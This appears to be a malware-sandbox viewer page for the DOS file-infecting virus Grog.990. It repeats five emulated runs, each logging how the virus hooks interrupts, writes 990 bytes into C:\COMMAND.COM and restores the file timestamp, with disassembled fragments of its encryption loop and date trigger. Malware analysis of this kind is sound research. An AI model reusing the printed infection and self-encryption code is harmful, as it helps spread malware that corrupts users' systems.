Sample viewer

vx.netlux.org/Virus.DOS.Grog.990

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:08:51.065699287Z 75 PC: 12a6f | Execute program
2018-12-17T23:08:51.067990664Z 46 PC: 12a86 | Set verify flag
2018-12-17T23:08:51.069303175Z 53 PC: 12d2d | Get interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-17T23:08:51.070688289Z 53 PC: 12d3c | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T23:08:51.072677592Z 37 PC: 12ae4 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T23:08:51.073885544Z 53 PC: 9ee78 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T23:08:51.075058372Z 37 PC: 9ee87 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T23:08:51.076487181Z 53 PC: 9f0a8 | Get interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-17T23:08:51.077972778Z 37 PC: 9f0ba | Set interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-17T23:08:51.079316382Z 67 PC: 9ef34 | Get or set file attributes
2018-12-17T23:08:51.084899763Z 61 PC: 9ef40 | Open file (Filename = 'C:\COMMAND.COM')
2018-12-17T23:08:51.091987713Z 66 PC: 9efa8 | Move file pointer
2018-12-17T23:08:51.093826548Z 66 PC: 9efa8 | Move file pointer
2018-12-17T23:08:51.095294948Z 63 PC: 9f143 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:08:51.098296929Z 62 PC: 9efd1 | Close file
2018-12-17T23:08:51.099961269Z 67 PC: 9efd9 | Get or set file attributes
2018-12-17T23:08:51.437099329Z 61 PC: 9efe4 | Open file (Filename = 'C:\COMMAND.COM')
2018-12-17T23:08:51.444837295Z 87 PC: 9eff5 | Get or set file date and time
2018-12-17T23:08:51.446840755Z 66 PC: 9efa8 | Move file pointer
2018-12-17T23:08:51.448506524Z 63 PC: 9f011 | Read file or device (Read 990 bytes on handle 5)
2018-12-17T23:08:51.455990209Z 66 PC: 9efa8 | Move file pointer
2018-12-17T23:08:51.457735853Z 64 PC: 9f023 | Write file or device (Write 990 bytes on handle 5)
2018-12-17T23:08:51.467856814Z 66 PC: 9efa8 | Move file pointer
2018-12-17T23:08:51.470266407Z 44 PC: 9f02d | Get time 0x9f02d: cmp dh, 0
0x9f030: je 0x9f028
0x9f032: mov si, 0x108
0x9f035: mov byte ptr [si], dh
0x9f037: mov si, 0x100
0x9f03a: mov cx, 0xe
0x9f03d: lodsb al, byte ptr [si]
0x9f03e: mov byte ptr [si + 0x800], al
0x9f042: loop 0x9f03d
0x9f044: mov si, 0x10e
0x9f047: mov cx, 0x3de
0x9f04a: lodsb al, byte ptr [si]
0x9f04b: sub al, dh
0x9f04d: mov byte ptr [si + 0x800], al
0x9f051: loop 0x9f04a
0x9f053: mov cx, 0x3de
0x9f056: mov dx, 0x901
0x9f059: mov ah, 0x40
0x9f05b: call 0x9f067
0x9f05e: pop dx
2018-12-17T23:08:51.473607296Z 64 PC: 9f05e | Write file or device (Write 990 bytes on handle 5)
2018-12-17T23:08:51.480507875Z 87 PC: 9f066 | Get or set file date and time
2018-12-17T23:08:51.482568177Z 62 PC: 9ef9a | Close file
2018-12-17T23:08:51.490495691Z 67 PC: 9ef5e | Get or set file attributes
2018-12-17T23:08:51.499571004Z 53 PC: 9f0a8 | Get interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-17T23:08:51.501098324Z 37 PC: 9f0ba | Set interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-17T23:08:51.506427465Z 37 PC: 9ee94 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T23:08:51.507670237Z 67 PC: 12aee | Get or set file attributes
2018-12-17T23:08:51.51290269Z 42 PC: 12a90 | Get date 0x12a90: or dh, 0xfe
0x12a93: cmp dh, 0xff
0x12a96: jne 0x12aa3
0x12a98: or dl, 0xfa
0x12a9b: cmp dl, 0xff
0x12a9e: jne 0x12aa3
0x12aa0: call 0x12d94
0x12aa3: mov bx, word ptr [0x4bf]
0x12aa7: mov ax, 0x4b47
0x12aaa: mov si, 0x4731
0x12aad: mov dx, si
0x12aaf: int 0x21
0x12ab1: cli
0x12ab2: mov ax, word ptr cs:[2]
0x12ab6: mov cx, 0xf7
0x12ab9: sub ax, cx
0x12abb: mov word ptr cs:[2], ax
0x12abf: push ax
0x12ac0: mov cx, cs
0x12ac2: sub ax, cx

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":16329,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:52:34.240273171Z 75 PC: 12a6f | Execute program
2018-12-25T12:52:34.244362087Z 46 PC: 12a86 | Set verify flag
2018-12-25T12:52:34.245416216Z 53 PC: 12d2d | Get interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:52:34.246546781Z 53 PC: 12d3c | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:52:34.249073329Z 37 PC: 12ae4 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:52:34.250428331Z 53 PC: 9ee78 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:52:34.252182792Z 37 PC: 9ee87 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:52:34.253274808Z 53 PC: 9f0a8 | Get interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:52:34.254633959Z 37 PC: 9f0ba | Set interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:52:34.25594211Z 67 PC: 9ef34 | Get or set file attributes
2018-12-25T12:52:34.262032244Z 61 PC: 9ef40 | Open file (Filename = 'C:\COMMAND.COM')
2018-12-25T12:52:34.268308292Z 66 PC: 9efa8 | Move file pointer
2018-12-25T12:52:34.269842035Z 66 PC: 9efa8 | Move file pointer (See above)
2018-12-25T12:52:34.271116437Z 63 PC: 9f143 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:52:34.273987592Z 62 PC: 9efd1 | Close file
2018-12-25T12:52:34.275647367Z 67 PC: 9efd9 | Get or set file attributes
2018-12-25T12:52:34.284512823Z 61 PC: 9efe4 | Open file (Filename = 'C:\COMMAND.COM')
2018-12-25T12:52:34.291003769Z 87 PC: 9eff5 | Get or set file date and time
2018-12-25T12:52:34.292314974Z 66 PC: 9efa8 | Move file pointer (See above)
2018-12-25T12:52:34.293638546Z 63 PC: 9f011 | Read file or device (Read 990 bytes on handle 5)
2018-12-25T12:52:34.300109292Z 66 PC: 9efa8 | Move file pointer (See above)
2018-12-25T12:52:34.301399847Z 64 PC: 9f023 | Write file or device (Write 990 bytes on handle 5)
2018-12-25T12:52:34.31098133Z 66 PC: 9efa8 | Move file pointer (See above)
2018-12-25T12:52:34.313213062Z 44 PC: 9f02d | Get time 0x9f02d: cmp dh, 0
0x9f030: je 0x9f028
0x9f032: mov si, 0x108
0x9f035: mov byte ptr [si], dh
0x9f037: mov si, 0x100
0x9f03a: mov cx, 0xe
0x9f03d: lodsb al, byte ptr [si]
0x9f03e: mov byte ptr [si + 0x800], al
0x9f042: loop 0x9f03d
0x9f044: mov si, 0x10e
0x9f047: mov cx, 0x3de
0x9f04a: lodsb al, byte ptr [si]
0x9f04b: sub al, dh
0x9f04d: mov byte ptr [si + 0x800], al
0x9f051: loop 0x9f04a
0x9f053: mov cx, 0x3de
0x9f056: mov dx, 0x901
0x9f059: mov ah, 0x40
0x9f05b: call 0x9f067
0x9f05e: pop dx
2018-12-25T12:52:34.315771761Z 64 PC: 9f05e | Write file or device (Write 990 bytes on handle 5)
2018-12-25T12:52:34.324015789Z 87 PC: 9f066 | Get or set file date and time
2018-12-25T12:52:34.325988463Z 62 PC: 9ef9a | Close file
2018-12-25T12:52:34.333213788Z 67 PC: 9ef5e | Get or set file attributes
2018-12-25T12:52:34.342148428Z 53 PC: 9f0a8 | Get interrupt vector (See above)
2018-12-25T12:52:34.34475077Z 37 PC: 9f0ba | Set interrupt vector (See above)
2018-12-25T12:52:34.346123844Z 37 PC: 9ee94 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:52:34.347284087Z 67 PC: 12aee | Get or set file attributes
2018-12-25T12:52:34.354274976Z 42 PC: 12a90 | Get date 0x12a90: or dh, 0xfe
0x12a93: cmp dh, 0xff
0x12a96: jne 0x12aa3
0x12a98: or dl, 0xfa
0x12a9b: cmp dl, 0xff
0x12a9e: jne 0x12aa3
0x12aa0: call 0x12d94
0x12aa3: mov bx, word ptr [0x4bf]
0x12aa7: mov ax, 0x4b47
0x12aaa: mov si, 0x4731
0x12aad: mov dx, si
0x12aaf: int 0x21
0x12ab1: cli
0x12ab2: mov ax, word ptr cs:[2]
0x12ab6: mov cx, 0xf7
0x12ab9: sub ax, cx
0x12abb: mov word ptr cs:[2], ax
0x12abf: push ax
0x12ac0: mov cx, cs
0x12ac2: sub ax, cx

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":16329,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:52:34.289611244Z 75 PC: 12a6f | Execute program
2018-12-25T12:52:34.2918977Z 46 PC: 12a86 | Set verify flag
2018-12-25T12:52:34.293869981Z 53 PC: 12d2d | Get interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:52:34.295206457Z 53 PC: 12d3c | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:52:34.296732598Z 37 PC: 12ae4 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:52:34.298635691Z 53 PC: 9ee78 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:52:34.300016764Z 37 PC: 9ee87 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:52:34.301506415Z 53 PC: 9f0a8 | Get interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:52:34.30845456Z 37 PC: 9f0ba | Set interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:52:34.310197621Z 67 PC: 9ef34 | Get or set file attributes
2018-12-25T12:52:34.316808524Z 61 PC: 9ef40 | Open file (Filename = 'C:\COMMAND.COM')
2018-12-25T12:52:34.325508805Z 66 PC: 9efa8 | Move file pointer
2018-12-25T12:52:34.328111026Z 66 PC: 9efa8 | Move file pointer (See above)
2018-12-25T12:52:34.330129747Z 63 PC: 9f143 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:52:34.334551622Z 62 PC: 9efd1 | Close file
2018-12-25T12:52:34.336674918Z 67 PC: 9efd9 | Get or set file attributes
2018-12-25T12:52:35.024664925Z 61 PC: 9efe4 | Open file (Filename = 'C:\COMMAND.COM')
2018-12-25T12:52:35.042808073Z 87 PC: 9eff5 | Get or set file date and time
2018-12-25T12:52:35.050860605Z 66 PC: 9efa8 | Move file pointer (See above)
2018-12-25T12:52:35.055695233Z 63 PC: 9f011 | Read file or device (Read 990 bytes on handle 5)
2018-12-25T12:52:35.066146747Z 66 PC: 9efa8 | Move file pointer (See above)
2018-12-25T12:52:35.06969795Z 64 PC: 9f023 | Write file or device (Write 990 bytes on handle 5)
2018-12-25T12:52:35.081675602Z 66 PC: 9efa8 | Move file pointer (See above)
2018-12-25T12:52:35.083689409Z 44 PC: 9f02d | Get time 0x9f02d: cmp dh, 0
0x9f030: je 0x9f028
0x9f032: mov si, 0x108
0x9f035: mov byte ptr [si], dh
0x9f037: mov si, 0x100
0x9f03a: mov cx, 0xe
0x9f03d: lodsb al, byte ptr [si]
0x9f03e: mov byte ptr [si + 0x800], al
0x9f042: loop 0x9f03d
0x9f044: mov si, 0x10e
0x9f047: mov cx, 0x3de
0x9f04a: lodsb al, byte ptr [si]
0x9f04b: sub al, dh
0x9f04d: mov byte ptr [si + 0x800], al
0x9f051: loop 0x9f04a
0x9f053: mov cx, 0x3de
0x9f056: mov dx, 0x901
0x9f059: mov ah, 0x40
0x9f05b: call 0x9f067
0x9f05e: pop dx
2018-12-25T12:52:35.088062359Z 64 PC: 9f05e | Write file or device (Write 990 bytes on handle 5)
2018-12-25T12:52:35.097186359Z 87 PC: 9f066 | Get or set file date and time
2018-12-25T12:52:35.099416864Z 62 PC: 9ef9a | Close file
2018-12-25T12:52:35.111516682Z 67 PC: 9ef5e | Get or set file attributes
2018-12-25T12:52:35.122325084Z 53 PC: 9f0a8 | Get interrupt vector (See above)
2018-12-25T12:52:35.126066264Z 37 PC: 9f0ba | Set interrupt vector (See above)
2018-12-25T12:52:35.128610659Z 37 PC: 9ee94 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:52:35.130023792Z 67 PC: 12aee | Get or set file attributes
2018-12-25T12:52:35.136517967Z 42 PC: 12a90 | Get date 0x12a90: or dh, 0xfe
0x12a93: cmp dh, 0xff
0x12a96: jne 0x12aa3
0x12a98: or dl, 0xfa
0x12a9b: cmp dl, 0xff
0x12a9e: jne 0x12aa3
0x12aa0: call 0x12d94
0x12aa3: mov bx, word ptr [0x4bf]
0x12aa7: mov ax, 0x4b47
0x12aaa: mov si, 0x4731
0x12aad: mov dx, si
0x12aaf: int 0x21
0x12ab1: cli
0x12ab2: mov ax, word ptr cs:[2]
0x12ab6: mov cx, 0xf7
0x12ab9: sub ax, cx
0x12abb: mov word ptr cs:[2], ax
0x12abf: push ax
0x12ac0: mov cx, cs
0x12ac2: sub ax, cx

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":16329,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:52:34.480797307Z 75 PC: 12a6f | Execute program
2018-12-25T12:52:34.487962611Z 46 PC: 12a86 | Set verify flag
2018-12-25T12:52:34.489259395Z 53 PC: 12d2d | Get interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:52:34.490583874Z 53 PC: 12d3c | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:52:34.493018413Z 37 PC: 12ae4 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:52:34.494451284Z 53 PC: 9ee78 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:52:34.495814686Z 37 PC: 9ee87 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:52:34.497336632Z 53 PC: 9f0a8 | Get interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:52:34.499359217Z 37 PC: 9f0ba | Set interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:52:34.500874405Z 67 PC: 9ef34 | Get or set file attributes
2018-12-25T12:52:34.507298399Z 61 PC: 9ef40 | Open file (Filename = 'C:\COMMAND.COM')
2018-12-25T12:52:34.514998219Z 66 PC: 9efa8 | Move file pointer
2018-12-25T12:52:34.516726081Z 66 PC: 9efa8 | Move file pointer (See above)
2018-12-25T12:52:34.518306285Z 63 PC: 9f143 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:52:34.521841796Z 62 PC: 9efd1 | Close file
2018-12-25T12:52:34.530727103Z 67 PC: 9efd9 | Get or set file attributes
2018-12-25T12:52:35.025740863Z 61 PC: 9efe4 | Open file (Filename = 'C:\COMMAND.COM')
2018-12-25T12:52:35.034189213Z 87 PC: 9eff5 | Get or set file date and time
2018-12-25T12:52:35.036016135Z 66 PC: 9efa8 | Move file pointer (See above)
2018-12-25T12:52:35.037741989Z 63 PC: 9f011 | Read file or device (Read 990 bytes on handle 5)
2018-12-25T12:52:35.044725109Z 66 PC: 9efa8 | Move file pointer (See above)
2018-12-25T12:52:35.04670536Z 64 PC: 9f023 | Write file or device (Write 990 bytes on handle 5)
2018-12-25T12:52:35.055804403Z 66 PC: 9efa8 | Move file pointer (See above)
2018-12-25T12:52:35.057820931Z 44 PC: 9f02d | Get time 0x9f02d: cmp dh, 0
0x9f030: je 0x9f028
0x9f032: mov si, 0x108
0x9f035: mov byte ptr [si], dh
0x9f037: mov si, 0x100
0x9f03a: mov cx, 0xe
0x9f03d: lodsb al, byte ptr [si]
0x9f03e: mov byte ptr [si + 0x800], al
0x9f042: loop 0x9f03d
0x9f044: mov si, 0x10e
0x9f047: mov cx, 0x3de
0x9f04a: lodsb al, byte ptr [si]
0x9f04b: sub al, dh
0x9f04d: mov byte ptr [si + 0x800], al
0x9f051: loop 0x9f04a
0x9f053: mov cx, 0x3de
0x9f056: mov dx, 0x901
0x9f059: mov ah, 0x40
0x9f05b: call 0x9f067
0x9f05e: pop dx
2018-12-25T12:52:35.061391871Z 64 PC: 9f05e | Write file or device (Write 990 bytes on handle 5)
2018-12-25T12:52:35.067773968Z 87 PC: 9f066 | Get or set file date and time
2018-12-25T12:52:35.069655691Z 62 PC: 9ef9a | Close file
2018-12-25T12:52:35.077086105Z 67 PC: 9ef5e | Get or set file attributes
2018-12-25T12:52:35.085478545Z 53 PC: 9f0a8 | Get interrupt vector (See above)
2018-12-25T12:52:35.086714064Z 37 PC: 9f0ba | Set interrupt vector (See above)
2018-12-25T12:52:35.092702305Z 37 PC: 9ee94 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:52:35.096815693Z 67 PC: 12aee | Get or set file attributes
2018-12-25T12:52:35.10429758Z 42 PC: 12a90 | Get date 0x12a90: or dh, 0xfe
0x12a93: cmp dh, 0xff
0x12a96: jne 0x12aa3
0x12a98: or dl, 0xfa
0x12a9b: cmp dl, 0xff
0x12a9e: jne 0x12aa3
0x12aa0: call 0x12d94
0x12aa3: mov bx, word ptr [0x4bf]
0x12aa7: mov ax, 0x4b47
0x12aaa: mov si, 0x4731
0x12aad: mov dx, si
0x12aaf: int 0x21
0x12ab1: cli
0x12ab2: mov ax, word ptr cs:[2]
0x12ab6: mov cx, 0xf7
0x12ab9: sub ax, cx
0x12abb: mov word ptr cs:[2], ax
0x12abf: push ax
0x12ac0: mov cx, cs
0x12ac2: sub ax, cx

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":16329,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:52:34.496929603Z 75 PC: 12a6f | Execute program
2018-12-25T12:52:34.5015078Z 46 PC: 12a86 | Set verify flag
2018-12-25T12:52:34.502472556Z 53 PC: 12d2d | Get interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:52:34.503555089Z 53 PC: 12d3c | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:52:34.505233213Z 37 PC: 12ae4 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:52:34.5064675Z 53 PC: 9ee78 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:52:34.507681946Z 37 PC: 9ee87 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:52:34.509442949Z 53 PC: 9f0a8 | Get interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:52:34.511635094Z 37 PC: 9f0ba | Set interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:52:34.512674494Z 67 PC: 9ef34 | Get or set file attributes
2018-12-25T12:52:34.517872857Z 61 PC: 9ef40 | Open file (Filename = 'C:\COMMAND.COM')
2018-12-25T12:52:34.525991791Z 66 PC: 9efa8 | Move file pointer
2018-12-25T12:52:34.527352656Z 66 PC: 9efa8 | Move file pointer (See above)
2018-12-25T12:52:34.528616738Z 63 PC: 9f143 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:52:34.531377897Z 62 PC: 9efd1 | Close file
2018-12-25T12:52:34.53301355Z 67 PC: 9efd9 | Get or set file attributes
2018-12-25T12:52:34.542039863Z 61 PC: 9efe4 | Open file (Filename = 'C:\COMMAND.COM')
2018-12-25T12:52:34.548458876Z 87 PC: 9eff5 | Get or set file date and time
2018-12-25T12:52:34.549773393Z 66 PC: 9efa8 | Move file pointer (See above)
2018-12-25T12:52:34.551042862Z 63 PC: 9f011 | Read file or device (Read 990 bytes on handle 5)
2018-12-25T12:52:34.555612592Z 66 PC: 9efa8 | Move file pointer (See above)
2018-12-25T12:52:34.55665736Z 64 PC: 9f023 | Write file or device (Write 990 bytes on handle 5)
2018-12-25T12:52:34.562514692Z 66 PC: 9efa8 | Move file pointer (See above)
2018-12-25T12:52:34.564364919Z 44 PC: 9f02d | Get time 0x9f02d: cmp dh, 0
0x9f030: je 0x9f028
0x9f032: mov si, 0x108
0x9f035: mov byte ptr [si], dh
0x9f037: mov si, 0x100
0x9f03a: mov cx, 0xe
0x9f03d: lodsb al, byte ptr [si]
0x9f03e: mov byte ptr [si + 0x800], al
0x9f042: loop 0x9f03d
0x9f044: mov si, 0x10e
0x9f047: mov cx, 0x3de
0x9f04a: lodsb al, byte ptr [si]
0x9f04b: sub al, dh
0x9f04d: mov byte ptr [si + 0x800], al
0x9f051: loop 0x9f04a
0x9f053: mov cx, 0x3de
0x9f056: mov dx, 0x901
0x9f059: mov ah, 0x40
0x9f05b: call 0x9f067
0x9f05e: pop dx
2018-12-25T12:52:34.566977048Z 64 PC: 9f05e | Write file or device (Write 990 bytes on handle 5)
2018-12-25T12:52:34.573270831Z 87 PC: 9f066 | Get or set file date and time
2018-12-25T12:52:34.575162343Z 62 PC: 9ef9a | Close file
2018-12-25T12:52:34.582883358Z 67 PC: 9ef5e | Get or set file attributes
2018-12-25T12:52:34.59163864Z 53 PC: 9f0a8 | Get interrupt vector (See above)
2018-12-25T12:52:34.593452718Z 37 PC: 9f0ba | Set interrupt vector (See above)
2018-12-25T12:52:34.594721487Z 37 PC: 9ee94 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:52:34.596081198Z 67 PC: 12aee | Get or set file attributes
2018-12-25T12:52:34.602602071Z 42 PC: 12a90 | Get date 0x12a90: or dh, 0xfe
0x12a93: cmp dh, 0xff
0x12a96: jne 0x12aa3
0x12a98: or dl, 0xfa
0x12a9b: cmp dl, 0xff
0x12a9e: jne 0x12aa3
0x12aa0: call 0x12d94
0x12aa3: mov bx, word ptr [0x4bf]
0x12aa7: mov ax, 0x4b47
0x12aaa: mov si, 0x4731
0x12aad: mov dx, si
0x12aaf: int 0x21
0x12ab1: cli
0x12ab2: mov ax, word ptr cs:[2]
0x12ab6: mov cx, 0xf7
0x12ab9: sub ax, cx
0x12abb: mov word ptr cs:[2], ax
0x12abf: push ax
0x12ac0: mov cx, cs
0x12ac2: sub ax, cx